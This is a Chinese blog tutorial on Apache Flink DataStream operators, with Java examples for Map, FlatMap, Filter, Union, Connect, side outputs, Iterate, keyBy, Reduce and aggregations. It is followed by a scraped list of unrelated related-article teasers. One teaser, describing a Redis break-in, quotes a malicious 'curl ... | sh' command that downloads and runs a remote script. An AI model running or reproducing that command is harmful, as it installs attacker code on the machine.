【Flink 从入门到成神系列 一】算子
- 👏作者简介:大家好,我是爱敲代码的小黄,阿里巴巴淘天Java开发工程师,CSDN博客专家
- 📕系列专栏:Spring源码、Netty源码、Kafka源码、JUC源码、dubbo源码系列
- 🔥如果感觉博主的文章还不错的话,请👍三连支持👍一下博主哦
- 🍂博主正在努力完成2023计划中:以梦为马,扬帆起航,2023追梦人
- 📝联系方式:hls1793929520,加我进群,大家一起学习,一起进步,一起对抗互联网寒冬👀
文章目录
- Flink-算子
- 一、Map
- 二、FlatMap
- 三、Filter
- 四、Union(真合并)
- 五、Connect(假合并)
- 六、CoMap, CoFlatMap
- 七、Split & select(已废弃)
- 八、side output
- 九、Iterate
- 十、keyBy
- 十一、Reduce
- 十二、Aggregations
- 十三、总结
Flink-算子
Transformations
算子可以将一个或者多个算子转换成一个新的数据流
使用 Transformations
算子组合可以进行复杂的业务处理
一、Map
DataStream
→ DataStream
Map
比较简单,遍历我们数据流的每一个元素,产生一个新的元素
作用:字符串的转换、去除空格等操作
注意:只能一对一
示例如下:
/*** 去除当前字符串的前后空格*/
public class MyMapFunction implements MapFunction<String, String> {@Overridepublic String map(String value) throws Exception {return value.trim();}
}
二、FlatMap
DataStream
→ DataStream
遍历当前数据流中的每一个元素,产生 N
(N = 0,1,2,3)个元素
**作用:**与 Map
有点像,主要可以输出多个
**注意:**一对一、一对多
示例如下:
/*** 将当前字符串按照逗号进行分割*/
public class MyFlatMapFunction implements FlatMapFunction<String, String> {@Overridepublic void flatMap(String value, Collector<String> collector) throws Exception {if (value == null || value.isEmpty()) {return;}for (String word : value.split(",")) {collector.collect(word);}}
}
三、Filter
DataStream
→ DataStream
过滤算子,根据数据流的元素的业务逻辑,返回 true
或者 false
true
:保留当前元素
false
:丢弃当前元素
**作用:**过滤某些不符合预期的数据流数据
示例如下:
/*** 过滤掉处于黑名单的数据流数据*/
public class MyFilterFunction implements FilterFunction<String> {private final static Set<String> blackSet = new HashSet<>();static {blackSet.add("num1");blackSet.add("num2");blackSet.add("num3");}@Overridepublic boolean filter(String value) throws Exception {return !blackSet.contains(value);}
}
四、Union(真合并)
DataStream
→ DataStream
合并两个或者更多的数据流产生一个新的数据流
新的数据流包括所合并的数据流的元素
注意:需要保证数据流中元素类型一致
/*** 聚合多条流数据*/
public class UnionFunction {private final static String hostName = "";private final static int port = 8088;public static void main(String[] args) throws Exception {// 1. 创建流环境StreamExecutionEnvironment env = StreamExecutionEnvironment.getExecutionEnvironment();// 2. 创建多条输入源DataStreamSource<String> dataStream1 = env.socketTextStream(hostName, port);DataStreamSource<String> dataStream2 = env.socketTextStream(hostName, port);// 3. 合并数据源DataStream<String> unionDataStream = dataStream1.union(dataStream2);// 4. 输出unionDataStream.print();// 5. 执行env.execute();}
}
五、Connect(假合并)
DataStream,DataStream → ConnectedStreams
合并两个数据流并且保留两个数据流的数据类型,能够共享两个流的状态
代码示例:
public class ConnectFunction {private final static String hostName = "";private final static int port = 8088;public static void main(String[] args) throws Exception {// 1. 创建流环境StreamExecutionEnvironment env = StreamExecutionEnvironment.getExecutionEnvironment();// 2. 创建多条输入源DataStreamSource<String> dataStream1 = env.socketTextStream(hostName, port);DataStreamSource<String> dataStream2 = env.socketTextStream(hostName, port);ConnectedStreams<String, String> connect = dataStream1.connect(dataStream2);}
}
六、CoMap, CoFlatMap
ConnectedStreams → DataStream
CoMap
和 CoFlatMap
并不是具体算子名称,而是一类操作名称
CoMap:基于 ConnectedStreams
数据流做 map
遍历
SingleOutputStreamOperator<Object> map = connect.map(new CoMapFunction<String, String, Object>() {@Override// 第一个数据流转换public String map1(String value) throws Exception {return value;}@Override// 第二个数据流转换public String map2(String value) throws Exception {return value;}
});
CoFlatMap:基于 ConnectedStreams
数据流做 flatMap
遍历
connect.flatMap(new CoFlatMapFunction<String, String, String>() {@Overridepublic void flatMap1(String value, Collector<String> collector) throws Exception {if (value == null || value.isEmpty()) {return;}for (String word : value.split(",")) {collector.collect(word);}}@Overridepublic void flatMap2(String value, Collector<String> collector) throws Exception {if (value == null || value.isEmpty()) {return;}for (String word : value.split(",")) {collector.collect(word);}}
});
七、Split & select(已废弃)
DataStream → SplitStream
根据条件将一个流分成两个或者更多的流
注意:
Split...Select...
中Split
只是对流中的数据打上标记,并没有将流真正拆分。- 通过
Select
算子将流真正拆分出来。 Split...Select...
已经过时
public static void main(String[] args) throws Exception {// 1. 创建流环境StreamExecutionEnvironment env = StreamExecutionEnvironment.getExecutionEnvironment();// 2. 创建多条输入源DataStreamSource<String> dataStream = env.socketTextStream(hostName, port);// 3. 定义拆分逻辑SplitStream<String> splitStream = dataStream.split(new OutputSelector<String>() {@Overridepublic Iterable<String> select(String value) {List<String> output = new ArrayList<>();if (value.equals("AAA")) {output.add("A");} else {output.add("B");}return output;}});// 4. 将数据流真正拆分splitStream.select("A").print("输出A:");splitStream.select("B").print("输出B:");}
八、side output
流计算过程,可能遇到根据不同的条件来分隔数据流
filter
分割造成不必要的数据复制
OutputTag<String> rtTag = new OutputTag("rt");OutputTag<String> qpsTag = new OutputTag("qps");SingleOutputStreamOperator<Object> process = dataStream.process(new ProcessFunction<String, Object>() {@Overridepublic void processElement(String value, Context ctx, Collector<Object> out) throws Exception {if (value.equals("RT")) {ctx.output(rtTag, value);} else if (value.equals("qps")) {ctx.output(qpsTag, value);} else {out.collect(value);}}});// 主流process.print();// rtDataStream<String> rtOutput = process.getSideOutput(rtTag);// qpsDataStream<String> qpsOutput = process.getSideOutput(qpsTag);
九、Iterate
DataStream → IterativeStream → DataStream
Iterate
算子提供了对数据流迭代的支持
迭代有两部分组成:迭代体、终止迭代条件
不满足终止迭代条件的数据流会返回到stream流中,进行下一次迭代
满足终止迭代条件的数据流继续往下游发送
// 获取迭代数据源
IterativeStream<String> iterate = dataStreamSource.iterate();// 迭代体
// 每次数据累加
DataStream<String> minusOne = iterate.map(new MapFunction<String, String>() {@Overridepublic String map(String value) throws Exception {return value + value;}
}).setParallelism(1);; // 设置 map 操作的并行度为1// 终止迭代条件(当数值小于等于10时,均再次进行迭代)
DataStream<String> stillGreaterThanZero = minusOne.filter(new FilterFunction<String>() {@Overridepublic boolean filter(String value) throws Exception {return value.length() <= 10;}
}).setParallelism(1); // 设置 filter 操作的并行度为1iterate.closeWith(stillGreaterThanZero);
十、keyBy
DataStream → KeyedStream
根据数据流中指定的字段来分区,相同指定字段值的数据一定是在同一个分区中
按照某 key
进行分组
dataStream.keyBy("word")
public class WordCount {public String word;public int count;public WordCount(String word, int count) {this.word = word;this.count = count;}public WordCount() {}
}
// 或者使用KeySelector
KeyedStream<WordCount, String> wordCountObjectKeyedStream = dataStreamSource.keyBy(new KeySelector<WordCount, String>() {@Overridepublic String getKey(WordCount wordCount) throws Exception {return wordCount.word;}
});
这里一定要注意:如果你采用的是 POJO
类,那么一定要加 Public
修饰符,因为 Flink
通过反射机制访问和操作这些字段,实现分组和聚合等操作
十一、Reduce
KeyedStream(根据key分组) → DataStream
对于分组完的数据流进行聚合处理
如果只是简单的累加操作,和 sum
区别不大
SingleOutputStreamOperator<WordCount> dataStream = wordCountObjectKeyedStream.reduce(new ReduceFunction<WordCount>() {@Overridepublic WordCount reduce(WordCount wordCount1, WordCount wordCount2) throws Exception {return new WordCount(wordCount1.word, wordCount1.count + wordCount2.count);}
});
十二、Aggregations
KeyedStream → DataStream
Aggregations代表的是一类聚合算子,具体算子如下:
// 根据键对流数据中的指定位置(索引为0)的值进行求和。
keyedStream.sum(0)
// 根据键对流数据中的名为"key"的字段的值进行求和。
keyedStream.sum("key")
// 根据键对流数据中的指定位置(索引为0)的值进行取最小值。
keyedStream.min(0)
// 根据键对流数据中的名为"key"的字段的值进行取最小值。
keyedStream.min("key")
// 根据键对流数据中的指定位置(索引为0)的值进行取最大值。
keyedStream.max(0)
// 根据键对流数据中的名为"key"的字段的值进行取最大值。
keyedStream.max("key")
//根据键对流数据中的指定位置(索引为0)的值进行最小值比较,并返回具有最小值的元素。
keyedStream.minBy(0)
//根据键对流数据中的名为"key"的字段的值进行最小值比较,并返回具有最小值的元素。
keyedStream.minBy("key")
// 根据键对流数据中的指定位置(索引为0)的值进行最大值比较,并返回具有最大值的元素
keyedStream.maxBy(0)
// 根据键对流数据中的名为"key"的字段的值进行最大值比较,并返回具有最大值的元素。
keyedStream.maxBy("key")
十三、总结
鲁迅先生曾说:独行难,众行易,和志同道合的人一起进步。彼此毫无保留的分享经验,才是对抗互联网寒冬的最佳选择。
其实很多时候,并不是我们不够努力,很可能就是自己努力的方向不对,如果有一个人能稍微指点你一下,你真的可能会少走几年弯路。
如果你也对 后端架构 和 中间件源码 有兴趣,欢迎添加博主微信:hls1793929520,一起学习,一起成长
我是爱敲代码的小黄,阿里巴巴淘天集团Java开发工程师,双非二本,培训班出身
通过两年努力,成功拿下阿里、百度、美团、滴滴等大厂,想通过自己的事迹告诉大家,努力是会有收获的!
双非本两年经验,我是如何拿下阿里、百度、美团、滴滴、快手、拼多多等大厂offer的?
我们下期再见。
从清晨走过,也拥抱夜晚的星辰,人生没有捷径,你我皆平凡,你好,陌生人,一起共勉。
相关文章:
【Flink 从入门到成神系列 一】算子
👏作者简介:大家好,我是爱敲代码的小黄,阿里巴巴淘天Java开发工程师,CSDN博客专家📕系列专栏:Spring源码、Netty源码、Kafka源码、JUC源码、dubbo源码系列🔥如果感觉博主的文章还不错…...
无人机自主寻优降落在移动车辆
针对无人机寻找并降落在移动车辆上的问题,一套可能的研究总体方案: 问题定义与建模: 确定研究的具体范围和目标,包括无人机的初始条件、最大飞行距离、允许的最大追踪误差等。建立马尔科夫决策过程模型(MDP)…...
科技感十足界面模板
科技感界面 在强调简洁的科技类产品相关设计中,背景多数分为:颜色或写实图片两种。 颜色很好理解,大多以深色底为主。强调一种神秘感和沉稳感,同时可以和浅色的文字内容形成很好的对比。 而图片背景的使用,就要求其…...
pytest装饰器 @pytest.mark.parametrize 使用方法
pytest.mark.parametrize 有三种传参方法,分别是: 1.列表传参:将参数值作为列表传递给装饰器。 pytest.mark.parametrize("param", [value1, value2, ..., valuen])2.元组传参:将参数值作为元组传递给装饰器。 pytes…...
redis被攻击
之前由于redis没有修改端口,密码也比较简单,也没有绑定ip 结果被攻击了 1 redis里被写入string类型的脚本,比如:Back1 Back2 Back3 Back4 ,内容curl -fsSL http://d.powerofwish.com/pm.sh | sh的形式,如下…...
二手买卖、废品回收小程序 在app.json中声明permission scope.userLocation字段 教程说明
处理二手买卖、废品回收小程序 在app.json中声明permission scope.userLocation字段 教程说明 sitemapLocation 指明 sitemap.json 的位置;默认为 ‘sitemap.json’ 即在 app.json 同级目录下名字的 sitemap.json 文件 找到app.json这个文件 把这段代码加进去&…...
【AI视野·今日Sound 声学论文速览 第四十期】Wed, 3 Jan 2024
AI视野今日CS.Sound 声学论文速览 Wed, 3 Jan 2024 Totally 4 papers 👉上期速览✈更多精彩请移步主页 Daily Sound Papers Auffusion: Leveraging the Power of Diffusion and Large Language Models for Text-to-Audio Generation Authors Jinlong Xue, Yayue De…...
Unity组件开发--升降梯
我开发的升降梯由三个部分组成,反正适用于我的需求了,其他人想复用到自己的项目的话,不一定。写的也不是很好,感觉搞的有点复杂啦。完全可以在优化一下,项目赶工期,就先这样吧。能用就行,其他的…...
插槽slot涉及到的样式污染问题
1. 前言 本次我们主要结合一些案例研究一下vue的插槽中样式污染问题。在这篇文章中,我们主要关注以下两点: 父组件的样式是否会影响子组件的样式?子组件的样式是否会影响父组件定义的插槽部分的样式? 2. 准备代码 2.1 父组件代码 <te…...
OpenCV-Python(25):Hough直线变换
目标 理解霍夫变换的概念学习如何在一张图片中检测直线学习函数cv2.HoughLines()和cv2.HoughLinesP() 原理 霍夫变换在检测各种形状的的技术中非常流行。如果你要检测的形状可以用数学表达式写出来,你就可以是使用霍夫变换检测它。即使检测的形状存在一点破坏或者…...
python接口自动化(七)--状态码详解对照表(详解)
1.简介 我们为啥要了解状态码,从它的作用,就不言而喻了。如果不了解,我们就会像个无头苍蝇,横冲直撞。遇到问题也不知道从何处入手,就是想找别人帮忙,也不知道是找前端还是后端的工程师。 状态码的作用是&a…...
Android 实现动态申请各项权限
在Android应用中,如果需要使用一些敏感的权限(例如相机、位置等),需要经过用户的授权才能访问。在Android 6.0(API级别23)及以上的版本中,引入了动态权限申请机制。以下是在Android应用中实现动…...
【leetcode】力扣热门之合并两个有序列表【简单难度】
题目描述 将两个升序链表合并为一个新的 升序 链表并返回。新链表是通过拼接给定的两个链表的所有节点组成的。 用例 输入:l1 [1,2,4], l2 [1,3,4] 输出:[1,1,2,3,4,4] 输入:l1 [], l2 [] 输出:[] 输入:l1 []…...
安全与认证Week3 Tutorial+历年题补充
目录 1) 什么是重放攻击? 2)什么是Kerberos系统?它提供什么安全服务? 3)服务器验证客户端身份的一种简单方法是要求提供密码。在Kerberos中不使用这种身份验证,为什么?Kerberos如何对服务器和客户机进行身份验证? 4) Kerberos的四个要求是什么?Kerberos系…...
【Kotlin】协程
Kotlin协程 背景定义实践GlobalScope.launchrunBlocking业务实践 背景 在项目实践过程中,笔者发现很多异步或者耗时的操作,都使用了Kotlin中的协程,所以特地研究了一番。 定义 关于协程(Coroutine),其实…...
Scikit-Learn线性回归(五)
Scikit-Learn线性回归五:岭回归与Lasso回归 1、误差与模型复杂度2、范数与正则化2.1、范数2.2、正则化3、Scikit-Learn Ridge回归(岭回归)4、Scikit-Learn Lasso回归1、误差与模型复杂度 在第二篇文章 Scikit-Learn线性回归(二) 中,我们已经给出了过拟合与模型泛化的概念并…...
React(2): 使用 html2canvas 生成图片
使用 html2canvas 生成图片 需求 将所需的内容生成图片div 中包括 svg 等 前置准备 "react": "^18.2.0","react-dom": "^18.2.0","html2canvas": "^1.4.1",实现 <div ref{payRef}></div>const pa…...
CAN物理层协议介绍
目录 编辑 1. CAN协议简介 2. CAN物理层 3. 通讯节点 4. 差分信号 5. CAN协议中的差分信号 1. CAN协议简介 CAN是控制器局域网络(Controller Area Network)的简称,它是由研发和生产汽车电子产品著称的德国BOSCH公司开发的,并最终成为国际标准(ISO11519) ࿰…...
华为OD机试真题-计算面积-2023年OD统一考试(C卷)
题目描述: 绘图机器的绘图笔初始位置在原点(0, 0),机器启动后其绘图笔按下面规则绘制直线: 1)尝试沿着横向坐标轴正向绘制直线,直到给定的终点值E。 2)期间可通过指令在纵坐标轴方向进行偏移,并同时绘制直线,偏移后按规则1 绘制直线;指令的格式为X offsetY,表示在横…...
设计模式之策略模式【行为型模式】
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档> 学习的最大理由是想摆脱平庸,早一天就多一份人生的精彩;迟一天就多一天平庸的困扰。各位小伙伴,如果您: 想系统/深入学习某…...
git使用(完整流程)
1. 新建仓库 1.右击 git bash 后 输入 git init (仓库为:当前目录) git init name (仓库为:name文件夹) git clone https://github.com/Winnie996/calculate.git //https2.工作区域 工作目录 3. 添加 提交 git add . //工作区添加至暂存区 git commit -m "注释内容&q…...
九、HTML头部<head>
一、HTML头部<head> 1、<title>- 定义了HTML文档的标题 使用 <title> 标签定义HTML文档的标题 <!DOCTYPE html> <html><head><meta charset"utf-8"><title>我的 HTML 的第一页</title> </head><b…...
机器学习期末复习
机器学习 选择题名词解释:简答题计算题一、线性回归二、决策树三、贝叶斯 选择题 机器学习利用经验 ,须对以下()进行分析 A 天气 B 数据 C 生活 D 语言 归纳偏好值指机器学习算法在学习的过程中,对以下(&a…...
python-日志模块以及实际使用设计
python-日志模块以及实际使用设计 1. 基本组成 日志模块四个组成部分: 日志对象:产生日志信息日志处理器:将日志信息输出到指定地方,例如终端、文件。格式器:在日志处理器输出之前,对信息进行各方面的美化…...
googlecode.log4jdbc慢sql日志,格式化sql
前言 无论使用原生JDBC、mybatis还是hibernate,使用log4j等日志框架可以看到生成的SQL,但是占位符和参数总是分开打印的,不便于分析,显示如下的效果: googlecode Log4jdbc 是一个开源 SQL 日志组件,它使用代理模式实…...
Linux程序、进程和计划任务
目录 一.程序和进程 1.程序的概念 2.进程的概念 3.线程的概念 4.单线程与多线程 5.进程的状态 二.查看进程信息相关命令: 1.ps:查看静态进程信息状态 2.top:查看动态进程排名信息 3.pgrep:查看指定进程 4.pstree&#…...
【MySQL】索引基础
文章目录 1. 索引介绍2. 创建索引 create index…on…2.1 explain2.2 创建索引create index … on…2.3 删除索引 drop index … on 表名 3. 查看索引 show indexes in …4. 前缀索引4.1 确定最佳前缀长度:索引的选择性 5. 全文索引5.1 创建全文索引 create fulltex…...
精确管理Python项目依赖:自动生成requirements.txt的智能方法
在Python中,可以使用几种方法来自动生成requirements.txt文件。这个文件通常用于列出项目所需的所有依赖包及其版本,使其他人或系统可以轻松地重现相同的环境。下面是几种常见的方法: 使用pip freeze: 这是最常见的方法。pip free…...
JavaWeb基础(1)- Html与JavaScript(JavaScript基础语法、变量、数据类型、运算符、函数、对象、事件监听、正则表达式)
JavaWeb基础(1)- Html与JavaScript(JavaScript基础语法、变量、数据类型、运算符、函数、对象、事件监听、正则表达式) 文章目录 JavaWeb基础(1)- Html与JavaScript(JavaScript基础语法、变量、数据类型、运算符、函数、对象、事件…...
java SSM体育器材租借管理系统myeclipse开发mysql数据库springMVC模式java编程计算机网页设计
一、源码特点 java SSM体育器材租借管理系统是一套完善的web设计系统(系统采用SSM框架进行设计开发,springspringMVCmybatis),对理解JSP java编程开发语言有帮助,系统具有完整的源代码和数据库,系统主要…...
wordpress封面图七牛/网页制作公司排名
转载:https://mp.weixin.qq.com/s/COf0SkP0K9GaHz8OfNA0Gg 转载理由:还不错...
做网站可以用什么软件/优化关键词排名外包
(前提要求都是把第二个页面的只传给第一个页面) 1.代理 一对一 在第二个页面设置代理 1.1在最上方设置 //选择房间的代理 protocol RoomVCDelegate <NSObject> 1.2设置代理方法 // 方法 -(void)selectRoomName:(NSString *)name; 1.3定…...
旅游网站的建设的文献综述/嘉兴百度seo
单词种类单词符号种别码单词种类单词符号种别码整型常数digit digit*1运算符*20字符串(标识符ID)letter(letter|digit)*2运算符/21关键字main3运算符22关键字if4运算符>23关键字else5运算符<24关键字do6运算符<25关键字while7运算符26关键字for…...
腾讯广告代理商/什么优化
2016年1月6日美国联邦贸易委员会(FTC)发布了一份题为《大数据:包容工具抑或排斥工具》(Big Data: A Tool for Inclusion or Exclusion?)的研究报告,介绍了大数据的生命周期、大数据技术应用给消费者带来的…...
自己做网站 最好的软件下载/百度收录网站入口
下载示例程序代码 - 1,162.6 KB 前言 这篇文章出自于我尝试学习使用Nhiberbnate的挫败感。我发现好像Nhibernate全部的介绍材料不是很模糊就是太详细。我所需要的就是一个简单直接的教程,能让我尽快对NHibernate熟悉起来。我从来没有找到。幸运的是,这篇…...
wordpress如何修改/网站域名在哪买
如果已设置环境中所述的所需环境,则在输入不带任何选项的命令 java weblogic.Server 时,WebLogic Server 会执行以下操作: 在 domain_name/config 目录中查找名为 config.xml 的文件。 如果 domain_name/config 目录中存在 config.xml&#…...